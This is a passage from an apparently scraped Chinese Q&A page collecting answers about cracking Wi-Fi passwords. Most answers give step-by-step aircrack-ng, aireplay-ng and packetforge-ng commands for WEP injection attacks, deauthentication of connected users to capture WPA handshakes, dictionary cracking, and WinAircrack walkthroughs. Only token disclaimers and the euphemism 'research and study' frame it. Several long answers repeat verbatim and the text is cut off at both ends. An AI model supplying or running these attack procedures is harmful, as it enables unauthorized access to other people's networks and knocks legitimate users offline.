利用虚拟连接的伪装客户端。如果有合法客户端那一般需要等几分钟,让合法客户端和ap 之间通信,少量数据就可产生有效ARP request 才可利用-3模式注入成功。如果没有任何通信存在,不能得到ARP request.,则这种攻击就会失败。如果合法客户端和ap之间长时间内没有ARP request,可以尝试同时使用-0 攻击。如果没有合法客户端,则可以利用-1 建立虚拟连接的伪装客户端,连接过程中获得验证数据包,从而产生有效ARP request。再通过-3 模式注入。aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0参数说明:【-3】:arp注入攻击模式【-b】:设置ap的mac【-h】:设置【-x】:定义每秒发送数据户包的数量,但是最高不超过1024,建议使用512(也可不定义)-4 Chopchop 攻击模式,用以获得一个包含密钥数据的xor 文件这种模式主要是获得一个可利用包含密钥数据的xor 文件,不能用来解密数据包。而是用它来产生一个新的数据包以便我们可以进行注入。aireplay-ng -4 -b <ap mac> -h <my mac> wifi0参数说明:-b:设置需要破解的AP的mac-h:设置虚拟伪装连接的mac(即自己网卡的mac)-5 fragment 碎片包攻击模式用以获得PRGA(包含密钥的后缀为xor 的文件)这种模式主要是获得一个可利用PRGA,这里的PRGA 并不是wep key数据,不能用来解密数据包。而是用它来产生一个新的数据包以便我们可以进行注入。其工作原理就是使目标AP重新广播包,当AP重广播时,一个新的IVS将产生,我们就是利用这个来破解aireplay-ng -5 -b <ap mac> -h <my mac> wifi0【-5】:碎片包攻击模式【-b】:设置ap的mac【-h】:设置虚拟伪装连接的mac(即自己网卡的mac)中国无线论坛中卫出品AnywhereWLAN!! 35Packetforge-ng:数据包制造程序Packetforge-ng <mode> <options>Mode【-0】:伪造ARP包packetforge-ng -0 -a <ap mac> -h <my mac> wifi0 –k 255.255.255.255 -l 255.255.255.255–y<.xor file> -w mrarp参数说明:【-0】:伪装arp数据包【-a】:设置ap的mac【-h】设置虚拟伪装连接的mac(即自己的mac)【-k】<ip[:port]>说明:设置目标文件IP和端口【-l】<ip[:port]>说明:设置源文件IP和端口【-y】<file>说明:从xor 文件中读取PRGA。后面跟xor 的文件名。【-w】设置伪装的arp包的文件名Aircrack-ng:WEP 及WPA-PSK key 破解主程序Aircrack-ng [optin] <.cap/.ivs file>Optinaircrack-ng -n 64 -b <ap mac> name-01.ivs参数说明:【-n】:设置WEP KEY 长度(64/128/152/256/512)aircrack-ng -x -f 2 name-01h.cap参数说明:【-x】:设置为暴力破解模式【-f】:设置复杂程度,wep密码设置为1,wpa 密码设置为2aircrack-ng -w password.txt ciw.cap【-w】:设置为字典破解模式,后面跟字典文件,再后面跟是我们即时保存的那个捕获到WPA 验证的抓包文件。中国无线论坛中卫出品AnywhereWLAN!! 36常见问题荟萃问题1:我在启动bt3 的时候,输入startx黑屏解答:在输入用户名root 和密码toor 以后输入xconf 这时会黑屏一会,然后出来提示符再输入startx 可进入win窗口;当实在不能进入win窗口的时候你也可以直接在提示符下输入各破解命令,同时可用alt+f1 打开一个shell,alt+f2 打开第二个shell,alt+f3 打开第三个等。关闭窗口用PRINT SCREEN 键问题2:在BT3中打开kismet 的时候窗口一闪就没了。解答:首先加载驱ifconfig -a rausb0 开始网卡监听:airmon-ng start rausb0。找到/usr/local/etc/kismet.conf打开此文件在channelsplit=true下面加入一行source=rt2500,rausb0,monitor注: wusb54g v4一定是rt2500 ,不是加载驱动时显示的rt2570。3945 的兄弟加入source=ipw3945,eth0,IPW39452023-08-09 19:09:453
No adapters have been detected-make sure peek5.sys is present and your card in
未检测到适配器, 请确认peek5.sys 被安装,并且您的卡被插入。2023-08-09 19:10:231
求一个可以抓包的手机Wifi软件
刚刚在kali NetHunter app store上找到一款贼厉害的安卓系统抓包软件,名字叫 Hijacker下载链接:https://sto去re.nethunter.com/re掉po/中com.hijacker_3文2.apk 软件简介:Hijacker是用于渗透测试工具Aircrack-ng,Airodump-ng,MDK3和Reaver的图形用户界面。 它提供了一个简单易用的UI来使用这些工具,而无需在控制台中键入命令并复制和粘贴MAC地址。 此应用程序需要具有支持监视器模式的内部无线适配器的ARM android设备。 少数android设备可以运行,但本机都不可用。 这意味着您将需要自定义固件。 任何使用BCM4339芯片组(MSM8974,例如Nexus 5,Xperia Z1 / Z2,LG G2,LG G Flex,三星Galaxy Note 3)的设备都可以与Nexmon(也支持其他一些芯片组)一起使用。 使用BCM4330的设备可以使用bcmon。 另一种选择是使用OTG电缆在Android中使用支持监视器模式的外部适配器。 从1.1版开始,包含了armv7l和aarch64设备所需的工具。 还包括用于BCM4339和BCM4358的Nexmon驱动程序和管理实用程序。 root访问也是必要的,因为这些工具需要root才能工作。2023-08-09 19:10:312
BT3怎么加载无线网卡
启动BT3后,加载驱动。3945网卡加载驱动是研究学习的关键。打开一个命令窗口 输入modprobe –r iwl3945 输入modprobe ipwraw 3.查找目标:用Airoscript的扫描功能连续三次都选择1,(没有图,简单的英文)(不能在命令窗口输入,在程序里面找)。发现5个,有4个加密,data都是0,开放的那个AP有一个客户端。 我们选择第一个作为目标,channel为11。输入 airmon-ng start wifi0 11 激活网卡的Monitor模式 <说明:11是要监听的频道,这个值要与你研究学习对象的值一致.4.在正确执行1、2步后,输入抓包命令来抓包。 输入命令 airodump-ng --ivs -w 12345 -c 11 wifi0 ,其中,12345是获取的ivs的保存文件的名字,11是channel值,你根据实际修改。开始监听channel 11了。5.上面窗口不关闭,另开一个窗口,输入命令,用自己的网卡连接要研究学习的ap 输入aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac wifi0 这时,系统将回显 Sending Authentication Request Authentication successful Sending Association Request Association successful :-) 这时,airodump-ng窗口的变化这时候等Data有了1万5就可新开个命令窗口,用aircrack-ng来研究学习了。研究学习结果:^_^大功告成。 输入y 回车,将得到一个至关重要的xor文件。(我自己试验在输入y后,系统开始发送数据,airodump-ng窗口一下就有了反应,Data数立即增长,我就没有必要进行下面的步骤了,等Data有1万5就用aircrack-ng破出了密码。) 再输入ls 查看当前目录,你将看到刚才生成的一个后缀名为xor 的文件。 7.输入packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 255.255.255.255 -l 255.255.255.255 -y fragment -××××-××××.xor -w mrarp 其中,–l中的l是L的小写,别和1混淆,而其中的××××-××××.xor 是你刚才生成的文件名。 系统回显:Wrote packet to: mrarp 8.输入aireplay-ng -2 –r mrarp -x 1024 wifi0 ,发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,我选择的是1024。 输入y 回车 攻击开始 这时,前面的抓包窗口上的data将迅速增加。 到数据增加到3万以上时,另开窗口,启动 aircrack-ng -n 64 -b ap的mac name-01.ivs 其中64 是64位密码,如果是128位,换成128即可。 有客户端的研究学习 前面的步骤一样: 输入modprobe –r iwl3945 输入modprobe ipwraw 现在,只要一个命令就搞定,输入:2023-08-09 19:10:381
WEP在哪里找?
破解WEP的方式大概有这几种:1、Linux + 无线网卡 + 可以工作在Monitor模式的驱动程序 + 破解软件(aircrack等);【首选】2、Windows + 更新版的驱动(可以处于监听模式) + 抓包软件(Omnipeek) + WEP破解软件(winaircrack、aircrack-ng for win等);3、Windows + CommView驱动 + 驱动支持的无线网卡 + 破解软件,有个软件叫AiroWizard,它为aircrack-ng加了个好用的界面,并整合了CommView驱动,网上很难下载到,因为被告了,这个project已经停了,但是只要你去找总是能下载的到的,我有AiroWizard 1.0 Beta revision 250,想要的话留个email就好了;4、Windows + USB无线网卡 + Vmware + Backtrack 3 ISO;5、直接刻一张有WEP破解软件的Live CD + CD支持的无线网卡。说明:第一种方法是最好最灵活的,在Windows下弄也能破解,如果你和我一样用的是intel 3945ABG的网卡,我劝你还是用Linux吧:Intel的新版驱动虽然支持被动侦听,却不支持主动攻击,如果你能找到一个流量很大的AP,那你可以试试,否则抓一整天包,IV数都不够你破解64位WEP的。 AiroWizard貌似是windows下一个较好的方法,但是你看看CommView的驱动网卡支持列表就会失望的:http://www.tamos.com/products/commwifi/adapterlist.php 但是AiroWizard这个软件界面真的不错,如果你有足够的WEP包,烦透了敲aireplay、airodump、aircrack这几个命令,仅仅是需要一个好的GUI的话,这是一个很好的选择。 第四种方法需要一个USB的无线网卡,而且用Vmware进系统之后还是要敲Linux命令的。 第五种方法是最快捷的方式,但是你一定要确认该CD有你的网卡驱动,否则你会刻出一张以后永远不会用到的光盘。 我曾尝试过2、3、5,都失败了,2本来可以成功的,但是我抓包抓的实在是没耐心了,下面简要介绍1——————————————————————————————————————————Ubuntu 8.04 LTS硬盘安装:建议采用硬盘安装而不是刻光盘,因为Linux版本更新实在太快了,刻张盘几个月后就没用了。我用的是WinGrub+Ubuntu8.04 Alternative CD,装8.04你可能会遇到LiveCD启动不了的问题,那就试试在Grub中加"all_generic_ide floppy=off irqpoll"这几个参数,也许就好了,如果是光盘启动,就先按F6,再输参数。我刚开始用的是Ubuntu8.04 Live CD,死活都驱动不了,什么内核参数都试过了,都没用,后来换成 Alternative CD就可以装了,鬼知道什么原因……WinGrub很容易用,注意设置成安装在"boot.ini"内,安装Alternative CD时要从网上down vmlinuz和initrd这两个文件,网上的教程一堆一堆的,随便搜一个就是了。————————————————————————————————————————WEP破解,我只有一台本本,所以只知道intel 3945abg的网卡可以这么做:1、说了这么多,最最重要的就是驱动,没驱动什么都干不了,aircrack-ng也有个驱动的支持列表,可喜的是intel系列的网卡在支持之列;但是Hardy自带的驱动叫iwl3945,aircrack是不支持的!尝试运行airodump命令就会发现有错误,需要安装ipwraw的驱动,网上一搜就有了,我装的是08年的某个版本,反正可以正常使用就对了;2、make & make install & make install_ucode(firmware,固件),参看readme就行了(注意安装之前最好先把build essential装了,免得出什么错误);3、安装aircrack-ng,在Ubuntu里直接用apt-get就可以搜的到,真是方便啊4、正式破解开始,最基本的需要以下几个命令: modprobe -r ipw3945 卸掉ipw3945驱动 到ipwraw的intel那个文件夹里头,运行./load 加载ipwraw驱动 airodump-ng wifi0 查看所有无线网络的信息,包括ESSID、BSSID,先记下来 airodump-ng -w out -b x:x:x:x:x:x wifi0 开始抓包 然后新开个terminal运行aireplay-ng,这个是aircrack的精华所在,好好研究下再用 aircrack-ng out-01.cap,aircrack很智能的,可以跟airodump-ng同时运行,按提示选择你要破解的AP就行了。———————————————————————————————————————— WEP破解太轻松了,第一次你可能要花好几个小时来弄(我可是花了好几天时间……),但是熟练的时候破解一个64位的WEP,5分钟就够了,128-bit也就10分钟左右搞定。 那么WPA能不能破解呢??我也找了不少这方面的资料,但是找到的方法只有BruteForce attack(暴力破解),就是一个一个密码的尝试,弱口令会很容易找出来,取决于你有一个好的密码字典文件,aircrack-ng的计算速度大概几百k/s吧,但是它需要一次完整的握手过程,所以你需要配合aireplay来用,反正我尝试过几次,都没破解出来,总之WPA比WEP要安全多了就是。 Over,偷着上上网就罢了,别干坏事!BTW:aircrack-ng的网站貌似被GFWed了,找国外代理就能上了。2023-08-09 19:10:451
关于BT5抓握手包,4个小时了为什么抓不上?
抓包抓不到 和信号强度 还有素具流量有一定的关系 先用mdk3攻击一下 马上抓就可以啦2023-08-09 19:10:522
怎样设置无线上网WPA密码
无线网络设置为WPA-PSK/WPA2-PSK AES加密方法:1、打开浏览器,在地址栏输入192.168.1.1(一般路由器地址是这个或者查看路由器背面的登录信息)进路由-输入用户名,密码 ,(默认一般是admin)。2、无线设置--无线安全设置--选择【WPA-PSK/WPA2-PSK】。①、认证类型:自动。②、加密算法:AES。③、PSK密码就是无线密码。设置成需要的密码。2023-08-09 19:10:592
怎么把bcm43142转为监听模式,我用了这个命令airmon-ng start wlan0然后就出现了这个:
网卡不支持监听模式…2023-08-09 19:11:121
Aircrack破WAP2时无法显示STATION怎么办
airodump需要输入[动作指令+目标频道+储存文件名+所用监听端口],然后还需要新开cmd窗口,使用aireplay进行虚拟发包,当目标AP有数据返回时airodump才会有数据变化,显示有否抓到握手包。 详细指令参数在各个功能里输入--help查看 airodump-ng –...2023-08-09 19:11:331
握手包怎么抓
获得WPAWPA2 握手包的方法有很多,下面介 绍通过aircrack-ng工具包来载获握手数据包。1、下载aircrack-ng工具包。2、终端里输入 sudo airomon-ng stat wlan0 启 动数据监控模式。3、终端里输入 sudo airodump -w wpa mon0 ( 此时监控端口应该为 mon0 ,DATA保存到以 wpa命名的文件中了)。这时大家就可以看到要抓包的AP DATA为0 4、 依次:网络连接图标->点鼠标左键->鼠标移到要 抓取握手数据包的AP上面点左键->。5、这时AP会提示你填入密码,随便填几个数字 或字母进去(注:但必需是八位,如: AAAAAAAA OR 88888888),然后点击连接。6、现在可以看到网络连接正在尝试连接无线 AP,回头看下步骤3的终端,DATA已经变为4个 了。7、再打开一个新的终端,输入 sudo aircrack-ng wpa*.cap 会看到里面有一个握手包了。就是这么简单的了~!2023-08-09 19:11:421
为什么抓不到握手包
握手包的抓取需要在用户正在拨号时才行。一般的方法是,在抓包的同时,用deauth攻击,让已经登录的用户断线,然后用户再次登录时就可以抓握手包了。不要一直攻击,否则合法用户连不上。当pwr显示的合法客户端的数值变为0时,表示他已经掉线了。这个过程需要多进行几次,得亲自盯着,靠全自动软件是不行的。sudo ifconfig wlan0sudo airmon-ng start wlan0sudo airodump-ng -w test mon0 -c 13在抓包的同时进行注入攻击sudo aireplay-ng -0 10 -a "bssid" mon0抓到握手包后,在airodump显示屏幕的右上角回有显示的,然后可以关闭无线网卡了,在本地用aircrack-ng,挂上字典,进行wpa-psk的破解。抓握手包只是万里长征的第一步,跑密码是真正的难题。2023-08-09 19:11:512
用虚拟机光盘镜像装载Bt5进入minldwep-get提示找不到无线网卡 ,我的网卡是水星MW54U的
这是因为你的无线网卡驱动和airodump不兼容,须要更新驱动。无线网络密码破解方法2009-03-24 14:55无线网络密码破解方法需要WinAircrackPack该工具包是一个无线工具的组合包,包括WinAircrack.exe,wzcook.exe,airdecap.exe以及airodump.exe四个程序,这些程序各有各的用。SSID号发现工具就是airodump.exe。对付 SSID影藏第一步:解压缩下载的工具包,运行里头的airodump.exe第二步:选择相应的网卡,输入对应无线网卡前的序号第三步:输入o或者a选择网卡模式,第四步:选择搜索频段,输入0是代表所有频段都检测的意思。第五步:接下来会提示你输入一个保存文件,这样该工具会把所有sniffer下来的数据包放到这个文件中第六步:only write wep ivs是否只检测WEP加密数据包,我们选择“Y”即可。第七步:这时会出现一个提示,大概意思就是说目前驱动还不支持,无法进行sniffer的操作。同时浏览器会自动转到一个页面,我们可以通过这个页面下载兼容驱动程序,升级我们的无线网卡让sniffer工具——airodump.exe可以顺利运行(2)下载无线网卡新驱动: 要想下载合适的无线网卡新驱动就需要到前面提到的那个跳转页面了。第一步:打开的页面地址为http://www.wildpackets.com/support/product_support/airopeek/hardware,我们通过这个地址下载适合自己网卡的可以使用airodump的驱动。第二步:在搜索设备页面中选择自己无线网卡的品牌和型号。笔者选择tp-link的所有无线产品进行查询,看看应该下载哪个驱动第三步:在查询结果页面中我们可以看到自己的网卡应该使用该站点提供的AR5005G驱动来使用airodump四步:再次返回http://www.wildpackets.com/support/product_support/airopeek/hardware页面,你会在该页内容上看到关于该驱动所兼容的atheros卡型号,里面会提到ar5005,虽然我们的是ar5005g但是可以使用。点该页面下方的the wildpackets atheros wireless driver v4.2链接进行下载即可第五步:下载wildpackets atheros wireless driver v4.2驱动到本地硬盘。第六步:打开后里面有三个文件,我们的无线网卡升级工作就要靠这三个文件。(3)安装无线网卡新驱动: 之前下载的wildpackets atheros wireless driver v4.2压缩包里的三个文件就是我们安装驱动的主角。第一步:在桌面网上邻居图标上点鼠标右键,并选择属性。第二步:在自己的无线网卡对应的本地连接上点鼠标右键,并选择属性。第三步:在无线网络连接属性窗口中的“常规”标签下点网卡信息旁边的“配置”按钮。第四步:在“驱动程序”标签中点“更新驱动程序”按钮。第五步:系统将出现硬件安装向导,我们选择“从列表或指定位置安装(高级),然后点“下一步”按钮第六步:然后选择“不要搜索,我要自己选择要安装的驱动程序”,点“下一步”按钮继续。七步:由于之前我们安装的驱动是*****无线网卡的官方驱动,所以系统默认会找到相应的驱动,我们不选择他们,点“从磁盘安装”。第八步:通过“浏览”按钮找到我们下载并解压缩的wildpackets atheros wireless driver v4.2文件保存目录。第九步:选择atheros ar5005g cardbus wireless network adapter,点“下一步”继续第十步:在安装驱动过程中会出现兼容性提示,我们点“仍然继续”即可。第十一步:系统复制必须文件到本地磁盘第十二步:完成硬件更新向导,我们的TP-LINK无线网卡现在已经变成了atheros ar5005g无线网卡了,这样才能够使用airodump这个无线网络sniffer工具。四、总 结:由于WEP破解的准备工作比较多,已经成功的将自己的网卡进行了更新驱动工作,这也是WEP加密破解的关键,开始 轻松破解无线网络WEP一、使用airodump抓取无线网络数据包并破解SSID名称:不管是找出已经禁用了SSID号广播的无线网络还是进行WEP解密工作,我们首先要做的就是通过无线网络sniffer工具——airodump来监视无线网络中的数据包。第一步:打开文章中下载的winaircrackpack压缩包解压缩的目录。第二步:运行airodump.exe程序,这个就是我们的sniffer小工具,他的正常运行是建立在我们无线网卡已经更新驱动的基础上。第三步:这时你会发现显示的信息和安装驱动前已经不同了,我们的***网卡名称已经变为13 atheros ar5005g cardbus wireless network adapter,也就是说他成功更新为与atheros兼容的硬件了。我们输入其前面的数字13即可。第四步:接下来是选择无线网卡的类型,既然说了是与atheros相兼容的,所以直接输入“a”进行选择即可。第五步:上面文章中提到了已经把无线网络的SSID广播功能取消了,这样我们假设还不知道该无线设备使用的哪个频段和SSID号。在这里输入0,这样将检测所有频段的无线数据包。实际上要想知道一个无线网络使用的频段是非常简单的,可以使用无线网卡管理配置工具,就像上文提到的那样,可以知道该无线网络使用的速度和频段,但是无法检测出SSID号。第六步:同样输入一个保存数据包信息的文件,例如输入softer。这样可以把检测到的数据包以及统计信息一起写到这个文件中,并为使用其他工具提供基础保证。第七步:是否只收集wep数据信息,我们点N”。这样将检测网络中的所有数据包不只WEP加密数据。第八步:最后airodump会自动检测网络中的所有频段,对无线网络中的无线数据包进行统计和分析。第九步:当统计的数据包比较多的时候,就可以自动分析出无线网络对应的SSID号和无线设备的MAC地址以及无线速度,发射频段和是否加密,采用何种方式加密了,是不是非常神气?例如设置的无线网络SSID号为softer,刚开始图7中统计时还没有检测出来,当数据达到一定数量后例如DATA处为15651时就可以看到ESSID号即SSID号为softer了。至此我们成功的实现了通过airodump找到没有开启SSID广播功能的无线网络对应的SSID号,所以说仅仅报着将SSID号隐藏并修改默认名字是不能阻止非法入侵者连接无线网络的。不管你是否开启SSID广播,我们都可以通过无线网络的sniffer工具来找出你的真实SSID名称。不过有一点要特别注意,那就是是否能够破解SSID名称是建立在airodump搜集到足够的数据包基础上的,也就是说也可能你的无线路由器开着,但是没有任何无线网卡和他通讯,这样airodump是无法检测到任何无线数据包并进行分析破解的。笔者在写本文进行的实验环境也是如此,那另外一块TP-LINK无线网卡510G安装在一台联想笔记本上并不停的通过无线路由器进行BT下载来保持总是不断有无线数据传输,这样才可以加快破解进程。另外当数据包没有收集足够多的情况下,airodump会出现错误信息,例如本来是WEP加密方式的无线网络,可能会检测为WPA。用户只需要多等些时间让airodump收集足够多的数据就可以保证显示结果的真实性了。二、使用WinAircrack破解WEP密文:虽然我们可以通过airodump来检测无线网络的基本信息,包括发射频段,无线网络的SSID名称,无线速度等。但是对于那些使用WEP加密了的无线网络就无能为力了,即使我们知道了无线网络的SSID号如果没有WEP加密密文的话,依然无法连接到该网络。不过airodump收集到的信息也是非常宝贵的,我们可以通过另外一个工具来分析出WEP密文。该工具的名称是WinAircrack,当然在用WinAircrack破解airodump收集到的信息前一定保证airodump收集的信息量要大,信息越多破解越不容易出问题,而且破解成功所需时间越短。第一步:打开下载的压缩包,运行里面的winaircrack.exe程序。第二步:在左边找到general,接下来点GENERAL界面中下方的click here to locate capture file...,让我们选择一个捕获文件。第三步:这个文件就是上面所提到的airodump保存下来的数据统计文件,第九步中已经为其起了一个名字叫softer了,那么我们到airodump.exe所在文件夹中找到softer.cap文件,这个文件就是捕获文件。第四步:回到general界面,在encryption type处选择WEP。第五步:在左边点WEP,在WEP设置标签中先检测64位密文,key index保持自动AUTO。因为大部分用户在设置无线路由器WEP加密时都选择了最简单的64位密文,他也是破解所需时间最短的。第六步:设置完毕点右下角的“aircrack the key...”按钮,winaircrack会自动根据softer.cap中保存的统计信息进行分析,暴力破解WEP密文。第七步:由于采取的是暴力破解方法,所以花费的时间会比较多,大概需要几个小时甚至更多的时间来破解一个64位的WEP密文。当发现WEP密文后会显示出内容.不过在实际操作过程中需要的时间会比较长,特别是当WEP密文设置的比较复杂时,例如使用多个数字或者增加加密位数达到128位等。另外通过airodump来收集无线数据传输包也是关键,也许对方开着路由器但并没有和网卡进行大流量数据传输,这样即使你开启airodump收集了几个小时,都可能出现无法获得足够数据包问题。仅仅是为了和大家交流,希望大家不要使用本文介绍的方法去入侵别人的无线网,大家能够明白WEP加密也不是百分之百安全,所以应该尽量使用WPA安全加密方式。2023-08-09 19:11:583
怎样在WIN7环境下获得握手包?
握手包的抓取需要在用户正在拨号时才行。一般的方法是,在抓包的同时,用deauth攻击,让已经登录的用户断线,然后用户再次登录时就可以抓握手包了。不要一直攻击,否则合法用户连不上。当pwr显示的合法客户端的数值变为0时,表示他已经掉线了。这个过程需要多进行几次,得亲自盯着,靠全自动软件是不行的。sudo ifconfig wlan0sudo airmon-ng start wlan0sudo airodump-ng -w test mon0 -c 13在抓包的同时进行注入攻击sudo aireplay-ng -0 10 -a "bssid" mon0抓到握手包后,在airodump显示屏幕的右上角回有显示的,然后可以关闭无线网卡了,在本地用aircrack-ng,挂上字典,进行wpa-psk的破解。抓握手包只是万里长征的第一步,跑密码是真正的难题。2023-08-09 19:12:072
如何获取握手包
建议楼主用aircrack-ng工具包获取握手包。使用方法:1、下载aircrack-ng工具包。2、终端里输入 sudo airomon-ng stat wlan0 启动数据监控模式。3、终端里输入 sudo airodump -w wpa mon0 ( 此时监控端口应该为 mon0 ,DATA保存到以wpa命名的文件中了)。4、依次:网络连接图标->点鼠标左键->鼠标移到要抓取握手数据包的AP上面点左键->。5、这时AP会提示你填入密码,随便填8个数字或字母进去,然后点击连接。6、现在可以看到网络连接正在尝试连接无线AP,回头看下步骤3的终端,DATA已经变为4个了。7、再打开一个新的终端,输入 sudo aircrack-ng wpa*.cap 会看到里面有一个握手包了。不要点 stop 如果点了stop,握手包就会丢失 。。获得握手包后,bini提示你跑字典,你点否,bini显示握手包路径,然后去找就可以了希望你成功,不过握手包不是问题,关键是你能否跑出密码来,这是国际难题。。。2011-08-14 Beini-1.2.3--- FeedingBottle 更新至3.2.1:修复桌面鼠标右键菜单无法运行程序的错误。--- 增加驱动和固件包 "x_rtl8188ru_20110812.tce",支持Realtek8188RU。--- 删除: "x_ath9k_htc_compat-wireless-2.6.38-rc4-1.tce","firmware.tcz"。--- 提示:本版本针对 Realtek8188RU 芯片开发,非此芯片的用户不建议使用。在无客户端进行伪连接操作时,请使用暴力伪连接方式,即:"Fake Auth(by force)",而不是普通的"Fake Auth(-1)"。2023-08-09 19:12:141
如何获取本机存储的无线网密码?? 如果回答的答案正确追加分数!!!
需要WinAircrackPack该工具包是一个无线工具的组合包,包括WinAircrack.exe,wzcook.exe,airdecap.exe以及airodump.exe四个程序,这些程序各有各的用。SSID号发现工具就是airodump.exe。对付 SSID影藏第一步:解压缩下载的工具包,运行里头的airodump.exe第二步:选择相应的网卡,输入对应无线网卡前的序号第三步:输入o或者a选择网卡模式,第四步:选择搜索频段,输入0是代表所有频段都检测的意思。第五步:接下来会提示你输入一个保存文件,这样该工具会把所有sniffer下来的数据包放到这个文件中第六步:only write wep ivs是否只检测WEP加密数据包,我们选择“Y”即可。第七步:这时会出现一个提示,大概意思就是说目前驱动还不支持,无法进行sniffer的操作。同时浏览器会自动转到一个页面,我们可以通过这个页面下载兼容驱动程序,升级我们的无线网卡让sniffer工具——airodump.exe可以顺利运行(2)下载无线网卡新驱动: 要想下载合适的无线网卡新驱动就需要到前面提到的那个跳转页面了。第一步:打开的页面地址为http://www.wildpackets.com/support/product_support/airopeek/hardware,我们通过这个地址下载适合自己网卡的可以使用airodump的驱动。第二步:在搜索设备页面中选择自己无线网卡的品牌和型号。笔者选择tp-link的所有无线产品进行查询,看看应该下载哪个驱动第三步:在查询结果页面中我们可以看到自己的网卡应该使用该站点提供的AR5005G驱动来使用airodump四步:再次返回http://www.wildpackets.com/support/product_support/airopeek/hardware页面,你会在该页内容上看到关于该驱动所兼容的atheros卡型号,里面会提到ar5005,虽然我们的是ar5005g但是可以使用。点该页面下方的the wildpackets atheros wireless driver v4.2链接进行下载即可第五步:下载wildpackets atheros wireless driver v4.2驱动到本地硬盘。第六步:打开后里面有三个文件,我们的无线网卡升级工作就要靠这三个文件。(3)安装无线网卡新驱动: 之前下载的wildpackets atheros wireless driver v4.2压缩包里的三个文件就是我们安装驱动的主角。第一步:在桌面网上邻居图标上点鼠标右键,并选择属性。第二步:在自己的无线网卡对应的本地连接上点鼠标右键,并选择属性。第三步:在无线网络连接属性窗口中的“常规”标签下点网卡信息旁边的“配置”按钮。第四步:在“驱动程序”标签中点“更新驱动程序”按钮。第五步:系统将出现硬件安装向导,我们选择“从列表或指定位置安装(高级),然后点“下一步”按钮第六步:然后选择“不要搜索,我要自己选择要安装的驱动程序”,点“下一步”按钮继续。七步:由于之前我们安装的驱动是*****无线网卡的官方驱动,所以系统默认会找到相应的驱动,我们不选择他们,点“从磁盘安装”。第八步:通过“浏览”按钮找到我们下载并解压缩的wildpackets atheros wireless driver v4.2文件保存目录。第九步:选择atheros ar5005g cardbus wireless network adapter,点“下一步”继续第十步:在安装驱动过程中会出现兼容性提示,我们点“仍然继续”即可。第十一步:系统复制必须文件到本地磁盘第十二步:完成硬件更新向导,我们的TP-LINK无线网卡现在已经变成了atheros ar5005g无线网卡了,这样才能够使用airodump这个无线网络sniffer工具。四、总 结:由于WEP破解的准备工作比较多,已经成功的将自己的网卡进行了更新驱动工作,这也是WEP加密破解的关键,开始 轻松破解无线网络WEP一、使用airodump抓取无线网络数据包并破解SSID名称:不管是找出已经禁用了SSID号广播的无线网络还是进行WEP解密工作,我们首先要做的就是通过无线网络sniffer工具——airodump来监视无线网络中的数据包。第一步:打开文章中下载的winaircrackpack压缩包解压缩的目录。第二步:运行airodump.exe程序,这个就是我们的sniffer小工具,他的正常运行是建立在我们无线网卡已经更新驱动的基础上。第三步:这时你会发现显示的信息和安装驱动前已经不同了,我们的***网卡名称已经变为13 atheros ar5005g cardbus wireless network adapter,也就是说他成功更新为与atheros兼容的硬件了。我们输入其前面的数字13即可。第四步:接下来是选择无线网卡的类型,既然说了是与atheros相兼容的,所以直接输入“a”进行选择即可。第五步:上面文章中提到了已经把无线网络的SSID广播功能取消了,这样我们假设还不知道该无线设备使用的哪个频段和SSID号。在这里输入0,这样将检测所有频段的无线数据包。实际上要想知道一个无线网络使用的频段是非常简单的,可以使用无线网卡管理配置工具,就像上文提到的那样,可以知道该无线网络使用的速度和频段,但是无法检测出SSID号。第六步:同样输入一个保存数据包信息的文件,例如输入softer。这样可以把检测到的数据包以及统计信息一起写到这个文件中,并为使用其他工具提供基础保证。第七步:是否只收集wep数据信息,我们点N”。这样将检测网络中的所有数据包不只WEP加密数据。第八步:最后airodump会自动检测网络中的所有频段,对无线网络中的无线数据包进行统计和分析。第九步:当统计的数据包比较多的时候,就可以自动分析出无线网络对应的SSID号和无线设备的MAC地址以及无线速度,发射频段和是否加密,采用何种方式加密了,是不是非常神气?例如设置的无线网络SSID号为softer,刚开始图7中统计时还没有检测出来,当数据达到一定数量后例如DATA处为 15651时就可以看到ESSID号即SSID号为softer了。至此我们成功的实现了通过airodump找到没有开启SSID广播功能的无线网络对应的SSID号,所以说仅仅报着将SSID号隐藏并修改默认名字是不能阻止非法入侵者连接无线网络的。不管你是否开启SSID广播,我们都可以通过无线网络的sniffer工具来找出你的真实SSID名称。不过有一点要特别注意,那就是是否能够破解SSID名称是建立在airodump搜集到足够的数据包基础上的,也就是说也可能你的无线路由器开着,但是没有任何无线网卡和他通讯,这样airodump是无法检测到任何无线数据包并进行分析破解的。笔者在写本文进行的实验环境也是如此,那另外一块TP-LINK无线网卡510G安装在一台联想笔记本上并不停的通过无线路由器进行BT下载来保持总是不断有无线数据传输,这样才可以加快破解进程。另外当数据包没有收集足够多的情况下,airodump会出现错误信息,例如本来是WEP加密方式的无线网络,可能会检测为WPA。用户只需要多等些时间让airodump收集足够多的数据就可以保证显示结果的真实性了。二、使用WinAircrack破解WEP密文:虽然我们可以通过airodump来检测无线网络的基本信息,包括发射频段,无线网络的SSID名称,无线速度等。但是对于那些使用WEP加密了的无线网络就无能为力了,即使我们知道了无线网络的SSID号如果没有WEP加密密文的话,依然无法连接到该网络。不过airodump收集到的信息也是非常宝贵的,我们可以通过另外一个工具来分析出WEP密文。该工具的名称是WinAircrack,当然在用 WinAircrack破解airodump收集到的信息前一定保证airodump收集的信息量要大,信息越多破解越不容易出问题,而且破解成功所需时间越短。第一步:打开下载的压缩包,运行里面的winaircrack.exe程序。第二步:在左边找到general,接下来点GENERAL界面中下方的click here to locate capture file...,让我们选择一个捕获文件。第三步:这个文件就是上面所提到的airodump保存下来的数据统计文件,第九步中已经为其起了一个名字叫softer了,那么我们到airodump.exe所在文件夹中找到softer.cap文件,这个文件就是捕获文件。第四步:回到general界面,在encryption type处选择WEP。第五步:在左边点WEP,在WEP设置标签中先检测64位密文,key index保持自动AUTO。因为大部分用户在设置无线路由器WEP加密时都选择了最简单的64位密文,他也是破解所需时间最短的。第六步:设置完毕点右下角的“aircrack the 